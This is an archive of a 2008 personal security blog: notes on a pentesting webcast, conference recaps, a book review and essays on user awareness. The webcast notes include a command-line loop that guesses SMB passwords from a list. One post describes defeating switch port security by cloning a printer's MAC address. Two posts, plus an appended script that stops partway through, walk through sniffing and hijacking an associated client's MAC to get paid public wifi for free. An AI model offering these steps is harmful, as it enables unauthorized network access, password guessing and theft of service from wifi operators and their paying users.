Friday, February 29, 2008

"Penetration Testing Ninjitsu" with Ed Skoudis webcast


If you didn't catch it live you can watch the recorded version of “Penetration Testing Ninjitsu” with Ed Skoudis. It was pretty good, and two more are lined up; the next one is in April.

https://coresecurity.webex.com/coresecurity/lsr.php?AT=pb&SP=EC&rID=4214202&rKey=32920A3595EA5972

slides:

http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf

Here are my notes from listening/watching it

C:\> ipconfig /displaydns

**dumps the DNS resolver cache: names this box has recently resolved, so likely targets (they may or may not be on the same network)

C:\> arp -a

**dumps the ARP cache, so those should be boxes on the same subnet as the one you are on

**also check the hosts file (%SystemRoot%\System32\drivers\etc\hosts) for hardcoded name-to-IP mappings

C:\> net use \\[target] [password] /u:[user]

**sets up an SMB session to the target with those credentials (no share mapped yet)

C:\> net use * \\[targetip]\[share] [password] /u:[user]

**maps the share to the next available drive letter; you can also give a specific drive letter instead of *

C:\> net use \\[targetip] /del
C:\> net use * /del

**Windows only lets you hold one set of credentials against a given server at a time (a second username to the same box gets the "multiple connections to a server or shared resource by the same user" error), so delete the existing session before trying another account; net use * /del tears them all down when you are done

FOR /L Loops --counters

C:\> for /L %i in ([start], [step], [stop]) do [command]

C:\> for /L %i in (1,1,255) do echo %i

**simple counter

C:\> for /L %i in (1,1,255) do echo %i & ping -n 5 127.0.0.1

**pauses a few seconds between iterations by pinging localhost, a poor man's sleep (ping -n N waits about N-1 seconds on Windows)

**to do more than one command [command1] & [command2]
**run command1 and only run command2 if command1 succeeds [command1] && [command2]

C:\> for /L %i in (1,1,255) do @echo %i & @ping -n 5 127.0.0.1 > nul

**@ = don't echo the command itself, just its output

** send errors to file [command] 2>>errorfile.txt

C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

**ping sweeper. Caveat: on Windows an unreachable host can also produce a line starting with "Reply from" (the "Destination host unreachable" answer from your own gateway), so find "TTL=" is a tighter filter for hosts that actually answered

nslookup [IPaddr]
**reverse lookup

C:\> for /L %i in (1,1,255) do @echo 10.10.10.%i: & @nslookup 10.10.10.%i 2>nul | find "Name"

**displays successful reverse lookups

C:\> for /L %i in (1,1,255) do @echo 10.10.10.%i: & @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

**shows IP and hostname if found

FOR /F Loops --files, strings, a file set's contents

C:\> for /f %i in (password.lst) do @echo %i & @net use \\[target_IP_addr] %i /u:[UserName] 2>nul && echo UserName: %i >>success.txt

** check slides for more examples

** mind the account lockout policy before running a list like that against a domain account (net accounts /domain shows the lockout threshold); every net use attempt with a wrong password counts as a failed logon

**scripting, .bat files

**in a .bat file the loop variable is written %%i instead of %i

C:\> for /L %i in (1,1,100) do @echo %i

**turns into

for /L %%i in (1,1,100) do @echo %%i
CG

Thursday, February 28, 2008

Two Good Posts Over on Rational Survivability


Chris Hoff did two good posts over on Rational Survivability.

1: News Flash: If You Don't Follow Suggested Security Hardening Guidelines, Bad Things Can Happen...
http://rationalsecurity.typepad.com/blog/2008/02/news-flash-if-y.html

Not so interested in the VM stuff, but the idea that the press sensationalizes security talks, like a GSM cracker for $1000.00, technically correct but not quite right... is right on.

and

how most of these exploits require that the sun be lined up right, the checkbox that is not checked by default is checked (or unchecked), and the user clicks on the links on Wednesdays between 2:00-3:15pm.

2: McGovern's "Ten Mistakes That CIOs Consistently Make That Weaken Enterprise Security"
http://rationalsecurity.typepad.com/blog/2008/02/mcgoverns-ten-m.html

Post on leadership mistakes that seem to happen all over, his own list is pretty good too. I posted a comment on what we can do about his #4:

Awareness initiatives are good for sexual harassment and copier training, not security

I did a blog post about that earlier, if users are broke then we need to start incorporating SE and owning users in our pentests as well as teaching kids about the dangers of the net and how to not be so gullible. We also need to make security training more than the "ok everyone time for annual security training...just click through the slides and print out your certificate..."

It really all boils down to you never get a free lunch. if you can instill and internalize that, you'll never get taken for one of those stupid scams. Of course if i find the girl that outed me on my "member" size its gonna be fight time.
CG

Saturday, February 23, 2008

Near Real Time Book Writing


While not an interesting book topic for me, the concept of getting the public to help on the book is pretty cool.

These guys are basically writing a book on Software Craftsmanship: From Apprentice to Journeyman and allow people to comment on all the facets of the book. Not too much in the way of content that I can see, but an interesting idea.

http://softwarecraftsmanship.oreilly.com/wiki

http://www.oreillynet.com/fyi/blog/2008/02/collaborate_often_watch_it_gro.html
CG

Hacking Exposed Windows 3rd ed Book Review


4 stars

Not bad for the 3rd iteration

Disclaimer: I received a review copy of HE:Windows.

The latest HE:Windows takes us toe to toe with Vista and Server 2008 and gives us a recap of some Win2k3 and Win2k knowledge. I was torn between whether to give this book three or four stars. I ended up giving it a four because it was well written, hit the majority of the objectives it laid out, and would be useful for someone that didn't have the two previous iterations. If you have the other two, keep in mind there is a fair amount of content reuse, and if you do this for a living it may come up short of expectations.

The book covers a lot of ground but at the end I was left feeling like the authors were saying that if I was pentesting a Vista host or Server 2008 host/domain I should just call it quits. Going back and rereading a bit of the HE: Windows Server 2003 book I felt they said the same thing in that book as well. This obviously ended up not being the case, and I don't think it will be the case with Vista and Server 2008 either. It's also not a viable option for any penetration tester.

Some examples of what I am talking about can be seen in Chapter 4, where the SMB enumeration examples only work against Windows 2000 and maybe Windows XP SP1. No mention of how to actually start pulling that information out of current environments. The Active Directory section reused the old content and didn't discuss any current tools or the changes in 2003 and 2008 environments, which have pretty much eliminated anonymous binds to extract information. Chapter 5, Hacking Windows Specific Services, reused a lot of content, which was disappointing; the reuse of the smbrelay content was especially disappointing given tools that work much better, like the smbrelay module in the Metasploit framework.

The rootkit chapter is pretty good and talks about a rootkit I had never heard of (Unreal rootkit).

Client side attacks has a decent update to it covering phishing, ActiveX, office and pdf exploits and a bit of cross site scripting, but refers you to the HE Web Applications book for more detail, which is fair.

Physical Attacks section is mostly the same with some updates on wireless, keyloggers and bootkits but mostly just overviews not followable steps.

Ch12, Windows security features and tools, is probably what pushed the book from a 3 to a 4. It covered BitLocker, Vista Windows integrity control, server hardening, stack protections, and other information.



CG

Wednesday, February 20, 2008

Blackhat DC '08 Day1 wrapup


Holy crap, just when I was feeling a little blue after Shmoocon (I felt the talks were better last year, but the location was better this year), BlackHat cheers me up.

Don't get me wrong, there are some unfun things. The "con" area is super cramped, no room to even walk during the talk breaks, rooms were like 100 degrees today, lunch sucked 'cept for the super sleepy good cheesecake, and the talk rooms were cramped for the popular talks. That aside, the talks I caught today were great. Maybe I just picked poorly at Shmoo, but I did good today.

Let's recap; schedule here if you want it.

Cracking GSM: David Hulton and Steve

David only got 20 minutes at Shmoocon, so it was a chance for Steve to do all the GSM theory and David to go a little more into the cracking process. Things from my notes:

-They were able to see the IMSI from their phone in cleartext, which is against the GSM standard; the IMSI is basically your GSM phone's unique ID.
-Every SIM has a JVM running on it and you can load and run code on there without the user's knowledge; phone operators regularly send updates to the phone and the user doesn't know.
-Your SIM stores the last 16 session IDs, so if an attacker can get physical access to your SIM and they have been recording the encrypted sessions they could potentially crack the last 16 calls or SMS, unless a phone operator is not cycling session IDs like they should.
-They built a GSM cracker; the commercial one was $1 million USD, theirs should be around $200k and crack a session key in 30 sec. The "cheap" one can be built for around $1500, you need 1 FPGA and 2 TB of tables, and it will take about 30-60 min to crack a key for a recorded call or SMS. No real info on how to go about recording those calls, but I imagine anyone that is thinking about buying one has figured out how to record the calls already.
-Links:
http://wiki.thc.org/gsm
http://picocomputing.com/

RFIDIOts!!!Practical RFID hacking (without soldering irons): Adam Laurie
Adam has given this talk a few times but I have never been able to see it; glad I went today.
Things from my notes:
-RFID chips are passive, the energy from the reader is what powers them up.
-two types; dumb and smart
-dumb= animal tags, door readers
-smart=smart cards, credit cards with chips, E-passports
-He did several cool demos reading and writing two different types of "dumb" RFID chips, showed reading his UK e-passport, and talked about some of the issues with the implementation. Very cool. He sells RFID reader/writers on his site, and the code (in Python) is freely available there.
-Links:
http://rfidiot.org/

Bad Sushi: Beating Phishers at their own game: Billy Rios & Nitesh Dhanjani
-They went into really good detail about phishers, phishing kits, ATM skimmers, really talking about the motivations and the total lack of hiding what they are doing. I didn't take many notes but a really good talk. The most interesting part was how most of the phishing kits were "backdoored", where the mailer in the code would also send a copy to the original code author, and how most of the people using the kits usually left it in there...cute.
-Links:
http://xs-sniper.com/blog/2008/01/28/bad-sushi-beating-phishers-at-their-own-game/
http://www.oreillynet.com/onlamp/blog/2008/01/bad_sushi_beating_the_phishers.html

URI Use and Abuse: Nathan McFeters & Rob Carter

What the F is a URI? Uniform Resource Identifier. Still lost? How about "http://", "ftp://", "aim://", "trillian://", "mailto://"... URI schemes allow a browser to hand off to other programs, and all registered URI schemes can be accessed via the browser.
-XSS is possible
-RFC 4395 to see URI Schemes
-talked about different vulnerabilities, see links, using URIs on windows, mac, and linux
-Links
http://xs-sniper.com/blog/sploits-conferences-and-papers/
http://xs-sniper.com/blog/proving-ground/

Scanning Applications 2.0 - Next Generation Scan, Attacks and Tools: Shreeraj Shah
I really didn't take any notes because he covered SO MUCH in the talk. I've been trying to wrap my head around web 2.0. It was definitely better to actually hear him talk through the slides even though he was a little hard to understand. He obviously knows his web 2.0 kung fu.
-I did go up after and ask Shreeraj about SQLi in web 2.0 apps. You basically have to feed all your SQLi through WSDL requests, which obviously makes current scanners worthless from a 2.0 standpoint, but he did write a tool called WsFuzzer and you can feed it whatever list of SQLi strings you want. So not totally automated; once you find the SQL injection point you can automate the rest, and you may or may not get any usable SQL error messages back depending on the web service and backend database. Tons of demos of using the tools and some example AJAX code on the BH disk, a very good added bonus.
-Links:
http://www.blueinfy.com/
http://www.blueinfy.com/tools.html
http://shreeraj.blogspot.com/

Other things of interest (maybe); I got to meet Richard Bejtlich of taosecurity, nice guy we talked for a minute after the phishing talk about user training versus technical fixes.

Talked to the SAINT guy; they have added a pivot function to the tool, so you exploit a host and they have built into their shellcode a proxy-type function so that I can now use SAINT's vuln or port scanner through that connection into the internal LAN without having to load any type of agent on the box like Core Impact does. Pretty cool if it works; I'm gonna see if I can get a demo set up.
CG

Tuesday, February 19, 2008

Blackhat DC '08


if anyone will be at BlackHat DC and wants to meet up give me a shout.

http://www.blackhat.com/html/bh-dc-08/bh-dc-08-main.html


-CG
CG

Monday, February 18, 2008

Verizon Voyager First Thoughts


So it was time to get a new phone and we are unfortunately stuck with Verizon because the whole damn family is on Verizon. Given a choice I'd be with AT&T for their phone selection and network availability, anyway... I had a BlackBerry 7130e, the one without the full keyboard. With Verizon you have to pay an additional 40 bucks a month for BlackBerry data. Being the cheap ass that I am I decided to go with one of these other smart-ish phones since I can't have an iPhone.

bring in the LG Voyager vx10000


It's basically the enV with the touch front and a few other software options; the keyboard layout on the inside is the same. Initial thoughts based on having had a BlackBerry: it's NOT push technology. I got the Verizon premium stuff so unlimited text and data. It was easy to set up my carnal and learnsecurityonline email to be checked from it, but you have to go and log into it, not have it pushed to you. Acceptable, just different.

To use the speakerphone you have to open the thing up and push the speaker button next to the CLR button. I don't care for the Bluetooth devices and usually use speakerphone when on the phone while I drive, so that's going to take some getting used to.

the touch screen on the front works ok, you get a little vibrate action for feedback, doesnt work so well when i use my thumb, better with fingers. which sucks because if you are a blackberry user you should have some mad thumb skills.

the VZnavigator (GPS) thing works ok, havent totally tried it out yet, easy to set up and get going, it told me i was at the house quickly.

the web browser has no java, so no google reader :-( thus far, i'm going to have to search for another solution to read blog stuff while on the road

the OS is the verizon/LG OS, no real opinions on this yet.

Tethering the device to use the phone as the modem: you can supposedly change some options on the phone and essentially use the phone with a Bluetooth adapter as an EVDO modem. It supposedly violates your TOS and instructions vary based on firmware versions. I'm still looking for my Bluetooth adapter to see how it works and looking a bit more into potential trouble. At the very worst it appears it is ok to use it on the "1x" network as a 14.4k modem; worst case you can download email through it (if you have about a week of unused minutes).

didnt come with any type of holster, not even a ghetto one

bottom line is i'm keeping it (so far) and if/when i get the modem thing working i'll post back or if i decide it sucks and want to rant
CG

Shmoocon 2008 (my $0.02)


So I missed day one of the con as I was stuck on planes and in airports for damn ages. After a few hours sleep I headed to DC to meet up with Chris and Joe and check out the presentations. Chris filled me in on H1kari's GSM presentation which sounded really cool. Gonna have to check that out.
I got to sit in on Jay Beale's "They're Hacking Our Clients!..." presentation. It was a repeat of the Toorcon talk and did not bring in much new material at all. Jay is a real sharp guy and a great presenter but he really was not talking about anything the folks listening did not already know. The user is the 'new' attack vector. He made good points and mentioned ideas for looking at user-agent strings from browsers, mail client identifiers and using those in conjunction with tools like Squid to prevent access to mail or the web until the user patches. I believe the term is NAC. All Jay was proposing is a simple form of NAC. Still, the method of implementation is not a bad idea but it's trivial to spoof user-agent strings to bypass that. Injecting iframes with mr-t into the user's browser once a day was also suggested. Not a bad way to detect third party plugins but what about when the user is on the road or at home?

I really want to see what happens when IT prevents a user from getting mail until he patches his computer. It seemed to me that the presentation forgot the fact that productivity trumps security every time. If what we do impacts a user's ability to perform their job we have failed at our job.

I'm not even going to comment on "Why are Databases so Hard to Secure" by Sheeri Cabral. She might be sharp and have DB knowledge but she really did not present well on what is an interesting topic. All I can remember is "ACLs are good".

Next up was "VoIP Penetration Testing: Lessons Learned" by John Kindervag and Jason Ostrom. This was an awesome talk. Great presenters and a really interesting topic. VLAN hopping with voiphopper! Damn cool and they did a live demo too! I can see sooo many networks getting owned with this! Unplug phone, plug in laptop, own network!

At that point I was fried after no sleep and 24 hours of travel so I blew off the next talks and crashed in the hotel room for a few hours. Drinks and dinner with Chris and then hanging with Joe and talking up a storm. Lots of fun.

Today I got to see valsmiths and danny's talk on Malware Software Armoring Circumvention. All I can say is DAMN! Very, very cool stuff! Follow Chris's link below and check it out. Well worth it if you are into RCE at all.

I was really excited to see Josh Wright's and Brad Antoniewicz's presentation on attacking EAP implementations. I was not disappointed at all. A damn cool talk about a very cool topic. So many of my clients use PEAP, TTLS or another flavor of EAP and so I was really interested to see attacks against 802.1x implementations in action. They show how easy it is to capture credentials, either hashes in the case of ms-chapv1/2 or in plain text PAP credentials, simply using a rogue AP and a patched version of FreeRADIUS. A live demo too!

Chris and I ran into dre and Marcin. It was cool to put a face to the names. After that I had to run to a cab and head back to the train.

All in all it was a good con. It was definitely more about chilling with some friends and meeting new people.

dean
dean de beer

Sunday, February 17, 2008

Shmoocon 08 Day 3


alright Day3!

Started the morning off right with coffee, then off to Valsmith and Danny Quist talking about Malware Software Armoring Circumvention. Very cool stuff and, for me, one of those sit-in-a-talk-about-things-you-don't-know-much-about sessions. The offensive-computing.net guys built a tool (Saffron) that can basically kick all these packers' asses and allows you to unpack all different kinds of binaries that have been packed with different tools so you can disassemble them and do malware analysis.

Their slides and code are already up:
http://www.offensivecomputing.net/?q=node/637

Keeping with the theme of stuff that was above my skill level, next up was Vulncatcher: Fun with Vtrace and Programmatic Debugging by atlas. Very cool talk on using programmatic debugging to find vulnerabilities in different types of code and different types of data structures.
You can check out atlas' site for more info: http://atlas.r4780y.com/cgi-bin/atlas

He was also nice enough to do an interview with LSO after DEFCON:
http://www.learnsecurityonline.com/index.php?option=com_content&task=view&id=229&Itemid=46

Last up was dre and marcin from TS/SCI Security talking about Path X: Explosive Security Testing Tools using XPath. From their blog: "In this talk, we’ll discuss how using XPath can aid security testing during unit tests and in the integration phase of the software development lifecycle. By using XPath, it’s easier to share data between both open source and commercial quality testing, source code analysis tools and web application scanners."

http://www.tssci-security.com/archives/2008/02/17/path-x-explosive-security-testing/

After that I had to bug out, get home, and get ready for the week. thanks again to Don for the ticket!
CG

Shmoocon 08 Day 2


Ok, I got up a little late and it took the spouse a minute or two to get me to the Metro, then the Metro was doing work on one of the tracks; suffice to say I was late and got there for the noon talks. I tried to get a hotel room Friday night but no dice; I did get one Saturday night so I didn't have to deal with the Metro crap.

Day2

Started with Jay Beale's "They're Hacking Our Clients! Why are We Focusing Only on the Servers" talk. It didn't seem any different than the slides from Toorcon. The gist is that we should incorporate client side testing into pen tests, because that's how people are getting in now, and that we shouldn't allow customers to cop out and say "we have a user education program so no attacking the clients." He then went on to talk about some VA stuff like checking Squid logs for clients on your network that are running vulnerable versions of apps like browsers or mail clients. You would then blackhole those guys off until patches were applied. I'll let Dean vent the most on that, because he raised the great point that if you blackhole some mucky muck's laptop and tell them to patch their box you're gonna get your ass fired up, especially since it's usually IT's job to patch stuff and most users don't have permissions to even update stuff most of the time.

next up was Why are Databases so Hard to Secure by Sheeri Cabral, i rolled in late and must have missed the good stuff because by the time i got in there i just saw a bunch of SQL in there and some talk about how developers should do something or the other...meh

after that was VoIP Penetration Testing: Lessons Learned by John Kindervag and Jason Ostrom for me the best talk of the day. they talked about some features they added to voiphopper. If you have seen the security focus article on VoIP hacking they just added to that. it was good though.

Got Citrix? Hack It! by Shanit Gupta talked about different ways to break out of Citrix apps to get command shells, IE boxes, or explorer boxes. pretty neat.

Advanced Protocol Fuzzing - What We Learned when Bringing Layer2 Logic to "SPIKE Land"
by Enno Rey and Daniel Mende. I'm a big believer in listening to a few talks at a con that are above your skill level so you can rise up to that. I'm not an exploit-dev guy, I wish I was, so I took the opportunity to listen to the layer 2 fuzzing talk. Enno and Daniel basically modified SPIKE to fuzz layer 2 Cisco protocols like DTP, VTP, MPLS and two others I don't remember. No exploitation, but they were able to get some "fun" reactions from different Cisco products.

talked some way cool wireless stuff with one of the intelguardians. He showed me wi-spy and zigbee and talked about the cool things in the future that could be done against zigbee type products.

didnt make the shmoo party, had dinner with dean and talked about the talks and some other projects we got working then hung out, had beers, and talked SQLI with j0e and dean.
CG

Saturday, February 16, 2008

Shmoocon 08 Day 1


hard to believe a year has gone by since the last shmoocon, but it has, here is a quick recap of Day1.

Day 1 started out really good.
Here is the schedule: http://www.shmoocon.org/schedule.html

Probably the coolest talk that I caught was H1kari's on cracking GSM A5/1 traffic. He and his company essentially built a monster GSM session hash generator and cracker. It's currently creating the tables (2 more months to go) and they built a high horsepower lookup computer too, all using Pico/FPGA cards. Really really cool. A little expensive for the average "hacker" but a neat project. The impact is that with their cracker they will be able to crack the session key in about 30 seconds and at that point can intercept and listen to calls over the GSM network. Not a whole ton of details on how all that "could" work but I'm sure they have it figured out.

I missed most of the other talks except for the phishing one, which was basically about a guy that did an unauthorized phishing training awareness webpage and campaign and how he did it, nothing spectacular.

There were tons of cool people running around, some of the guys from the chicago 2600 were there, Muts and the BackTrack/off-sec guys were there, met Chris Hoff (rational security), Ed, Jay and all the intelguardians, the hak5 guys recorded a show live, the guys from Iron::Guard security were there, of course Joe from LearnSecurityOnline, great networking going on which is always a big part of the con experience.

Hit up some of the vendors; the coolest vendor I talked to was the Blue Coat guys. Blue Coat is a proxy that basically does an authorized MITM of all the traffic entering and leaving your network. The big thing is that it can do SSL on the fly, so you can stick a device in the middle and look at the traffic flying by. It will also check that the protocol matches the port, so it will verify for you that if data is leaving your network on 21 or 80 it really is FTP or HTTP traffic instead of someone just using those allowed outbound ports to do evil things. Pretty neat.

Anyway, talks I want to catch tomorrow will be Jay Beale's Client Side Penetration talk, the two SIP talks and probably the Citrix talk.

thanks again Don from EthicalHacker.net for letting me cover the event aka bought my ticket :-)
CG

Monday, February 11, 2008

Reliable Local Root since 2006?


CG

client side attacks and technical solutions -- is it always a technical solution?


After talking to my buddy Joe about some client side attacks he came out with the "what is the technical remediation?" question.

It seems the last few years have been about technical remediation for a non-technical problem (exploiting users) delivered over a technical medium (internet/email). The remediation is usually to patch the flaw in IE or Yahoo or third-party piece of crap X, Y or Z. At what point are we going to start addressing the reason for client side exploits and why they work so well... the client.

Let's face it, AV is pretty much worthless to anything custom and malicious, its going to be a long while before "Everyone" starts writing secure code, and even then chances are i can still get a user to load, click, run, do whatever i want with the right email sent to them. so is there a technical solution to it?

At some point you have to address the underlying issues behind problems (especially when they can be easily identified). The underlying issue is uneducated users clicking on things they should know better than to click on, or downloading and running executables from god knows where. User education is key, responsibility for actions is another, and mostly it's just teaching that there is no "free lunch" in real life and there is certainly no free lunch on the internet. There is an awesome commercial on TV about some dude trying to run a 419 scam on a bus and the people looking at him like WTF, get the hell out of here; it's a good commercial for internet safety and how ridiculous most phishing scams are when you take a second to really look at them.

Do I have a training program that will educate everyone? I wish, then I'd be getting paid a lot more, but I will say that a lot of places' user training programs that I have been exposed to are crap and lumped in with all the other mandatory crap people have to do in a year. Think of it this way: you get 1 hour a year of IT security training. Now compare that to how much time the average user spends staring at the internet and email in a year. I'm not going to do the math but that's a very, very small percentage of all the hours you work in a year, not even counting time spent on the internet at home.

So what's the point? The point is that the collective "we" need to stop allowing users to be click happy idiots on the browser or outlook inbox if we want to start actually working on fixing the client side piece. significant emotional events tend to make change in people, i'll leave the rest of that up to your imagination.

From ZDnet
Father of anti-virus says to invest in security awareness training
CG

Thursday, February 7, 2008

Why "sticky" port security is dumb when your physical security sucks


If you haven't heard of POPI security, now you have:

P = Physical
O = Operational (OPSEC)
P = Personnel
I = Information(INFOSEC)

All that whiz bang pop-a-shell-with-Metasploit-and-dump-your-mom's-PII stuff falls into the "I", and they go up in order of ease, cost and complexity. For example, throwing a rock through a window and climbing into an office is in the "P" and cheap, whereas a TEMPEST attack is in the "I" and usually not cheap and requires a high degree of technical ability. Hopefully that makes sense.

Anyway, all that leads to the "no shit there I was" story of doing the onsite assessment. We roll in and get told there is "Sticky Port Security" on the switches. Begrudgingly we had given them our MAC addresses prior to the assessment so they could reserve us some IP space in the DHCP pool. So we set our IPs to the static ones they said we would have and nothing. A few phone calls later, still nothing.

Eventually we tried plugging into empty network drops and setting things to DHCP, and voila... IP addresses (not the ones we were assigned) and connectivity. So much for port security; it's not much good when you leave hot, open drops.

The "sticky" part of the security was a pain because we had 4 laptops and only 2 hot drops, and the switch would only allow the one learned MAC address per port. Thankfully, two networked printers were in the room: print each printer's configuration page (which lists its MAC), clone that MAC onto a laptop with SMAC for Windows, plug into the printer's drop, and we had the other two laptops up and running. Yes, a simple 4-port router that clones MAC addresses would have worked too, but we didn't bring one.

Getting reverse shells back to our Linux hosts in VMware will be for another post, but we made it happen using VMware NATing & Fpipe.

Anyway, I mention physical security because:
1-we negated the port security by changing our MAC address and unplugging the printer from the network
2-because they didnt turn off ports that were unused we were handed IP addresses on the LAN
3-if the objective had been to just get "access" to the LAN we were done in 20 minutes
4-because of the open drops, 5 minutes and a wifi router on one of them and we could have had all the internal access we needed.

Just something to think about when you smile smugly and tell people you have port security on your switches while your physical security sucks.
CG

MAC address stealing for public wifi use Part 2


Mostly just notes for myself, but since Ubuntu can be a little tricky sometimes maybe they will help some other poor soul too...

**Like in the previous post said:
Run airodump and see who is associated to the WAP you want to access; those MACs that are associated with the AP have obviously paid (or hijacked someone's shit like you are about to do).

**Actually doing it:
In the upper right by your wireless bars, right click and uncheck the wireless box so the network applet stops managing the card while you change the MAC.

**Take the interface down so you can change the MAC
root@segfault:/home/cg# ifconfig ath0 down

**Change the MAC
root@segfault:/home/cg# ifconfig ath0 hw ether 00:06:25:27:55:EB

**Bring the interface back up
root@segfault:/home/cg# ifconfig ath0 up

**Check to see if the MAC took correctly
root@segfault:/home/cg# ifconfig ath0
ath0 Link encap:Ethernet HWaddr 00:06:25:27:55:EB
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:3278 errors:0 dropped:0 overruns:0 frame:0
TX packets:616 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:859916 (839.7 KB) TX bytes:86127 (84.1 KB)

Now, in the upper right where there is probably a computer icon with a red X, right click and enable wireless; you should sync up and get an IP. At this point run Wireshark and see if someone else is using your MAC and IP; if you are associated and can't actually get anywhere, that is probably the problem. Pick another MAC address and redo the steps.
CG

Tuesday, February 5, 2008

MAC address stealing for public wifi use


Keeping with my theme of "you never know when you need to crack WEP" or be able to get internet access...

If you find yourself in a life or death situation and it's imperative that you get your lappy on the net to send that "help me!" email and they are using MAC authentication, meaning only registered MACs can access the net, you can do the following:

pull out your trusty Ubiquiti or orinoco card or whatever you use and put it in monitor mode.

root@ineedhelp! #airmon-ng start wifi0

it will tell you what interface it started, for me and the ubiquiti card it was eth2

root@ineedhelp! #airodump-ng eth2

You should see something like the below:

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:C0:02:3A:C4:32, 2008-02-03 17:46:43, 2008-02-03 17:47:03, 11, 54, OPN , , , 2, 11, 5, 172. 16. 17. 42, 9, INTESA9-A,
00:C0:02:3A:AF:0E, 2008-02-03 17:46:41, 2008-02-03 17:47:07, 11, 54, OPN , , , 1, 11, 12, 172. 16. 16.225, 8, INTESA15,
00:02:2D:AB:1D:4E, 2008-02-03 17:46:40, 2008-02-03 17:47:10, 4, 11, OPN , , , 7, 26, 72, 172. 16. 16. 76, 8, INTESA13,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:12:17:72:5F:18, 2008-02-03 17:46:41, 2008-02-03 17:47:09, -1, 36, 00:02:2D:AB:1D:4E,
00:12:17:98:00:C5, 2008-02-03 17:46:44, 2008-02-03 17:46:58, -1, 3, 00:02:2D:AB:1D:4E,
00:12:17:97:D8:2D, 2008-02-03 17:46:46, 2008-02-03 17:46:46, -1, 1, 00:02:2D:AB:1D:4E,
00:12:17:98:39:6F, 2008-02-03 17:46:50, 2008-02-03 17:46:50, -1, 1, 00:02:2D:AB:1D:4E,
00:06:25:27:55:EB, 2008-02-03 17:46:47, 2008-02-03 17:46:59, 8, 4, 00:C0:02:3A:AF:0E,
00:12:17:A4:65:45, 2008-02-03 17:46:56, 2008-02-03 17:47:06, 12, 4, 00:02:2D:AB:1D:4E, INTESA13
00:12:17:98:2B:6F, 2008-02-03 17:46:48, 2008-02-03 17:46:50, 11, 2, (not associated) , INTESA9-A
00:12:17:98:44:4B, 2008-02-03 17:46:40, 2008-02-03 17:47:02, 9, 8, 00:02:2D:AB:1D:4E,
00:12:17:98:2B:6E, 2008-02-03 17:47:00, 2008-02-03 17:47:01, 0, 2, (not associated) , INTESA10

Go ahead and pick someone associated; that's going to be a valid MAC address for you to steal....er, borrow.

00:12:17:98:44:4B, 2008-02-03 17:46:40, 2008-02-03 17:47:02, 9, 8, 00:02:2D:AB:1D:4E,

00:12:17:98:44:4B <-- Client MAC

00:02:2D:AB:1D:4E <-- WAP MAC

from there its a simple:

root@ineedhelp! #ifconfig eth2 down
root@ineedhelp! #ifconfig eth2 hw ether 00:12:17:98:44:4B
root@ineedhelp! #ifconfig eth2 up

now you should be handed a valid IP

root@ineedhelp! #ifconfig eth2
eth2 Link encap:Ethernet HWaddr 00:12:17:98:44:4B
inet addr:172.16.16.56 Bcast:172.16.16.255 Mask:255.255.255.0
inet6 addr: fe80::a800:4ff:fe00:a04/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:188860 errors:1128 dropped:1128 overruns:0 frame:1128
TX packets:65680 errors:1183 dropped:1 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:44299003 (42.2 MB) TX bytes:11928926 (11.3 MB)
Interrupt:3 Base address:0x5100

now you can send your emergency email, make that emergency blog post, or just search the net for the answer to your emergency...
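An added example, not code from either of these posts or from the aircrack-ng project: a small shell script that parses the CSV file airodump-ng writes (with -w) to list the stations that are actually associated to an AP, busiest first, and then does the MAC swap. The same clone step covers the wired version of this trick in the sticky port security post, where the borrowed address came off a printer's configuration page instead of an airodump dump. The interface name wlan0, the use of ip(8) instead of ifconfig, and the arping-based conflict check (for what the follow-up post does by eye in Wireshark) are assumptions of mine, not from the posts; the CSV below is constructed from the capture shown above.

```shell
#!/bin/sh
# Added example, not from the original posts. Parses an airodump-ng CSV dump
# (the file written by "airodump-ng -w <prefix>") to list clients that are
# actually associated to an AP, then clones one of those MACs onto a local
# interface. Assumptions: Linux with iproute2 (ip link) for the re-addressing
# step and iputils arping for the optional conflict check. wlan0 is made up.

# Constructed sample in airodump-ng's CSV layout, modelled on the dump in the post.
SAMPLE_CSV='
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:C0:02:3A:AF:0E, 2008-02-03 17:46:41, 2008-02-03 17:47:07, 11, 54, OPN , , , 1, 11, 12, 172. 16. 16.225, 8, INTESA15,
00:02:2D:AB:1D:4E, 2008-02-03 17:46:40, 2008-02-03 17:47:10, 4, 11, OPN , , , 7, 26, 72, 172. 16. 16. 76, 8, INTESA13,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:12:17:72:5F:18, 2008-02-03 17:46:41, 2008-02-03 17:47:09, -1, 36, 00:02:2D:AB:1D:4E,
00:06:25:27:55:EB, 2008-02-03 17:46:47, 2008-02-03 17:46:59, 8, 4, 00:C0:02:3A:AF:0E,
00:12:17:98:2B:6F, 2008-02-03 17:46:48, 2008-02-03 17:46:50, 11, 2, (not associated) , INTESA9-A
00:12:17:98:44:4B, 2008-02-03 17:46:40, 2008-02-03 17:47:02, 9, 8, 00:02:2D:AB:1D:4E,
'

# associated_stations [bssid]   (CSV on stdin)
# Prints "station_mac bssid packets", busiest client first, for every station
# whose BSSID column holds a real AP address. "(not associated)" rows are
# clients that are only probing, so the AP has not accepted them; they are
# dropped. With a BSSID argument only clients of that AP are listed.
associated_stations() {
  awk -v want="$1" '
    BEGIN { FS = ", *" }
    /^Station MAC/ { in_stations = 1; next }
    in_stations && NF >= 6 && length($6) == 17 && $6 ~ /^[0-9A-Fa-f:]+$/ {
      if (want == "" || toupper($6) == toupper(want))
        printf "%s %s %s\n", $1, $6, $5
    }
  ' | sort -k3,3nr
}

# clone_mac <iface> <mac>
# Same effect as the ifconfig down / hw ether / up sequence in the post, done
# with ip(8). Needs root for real; set DRY_RUN=1 to print the commands instead.
clone_mac() {
  _run=
  [ -n "${DRY_RUN:-}" ] && _run=echo
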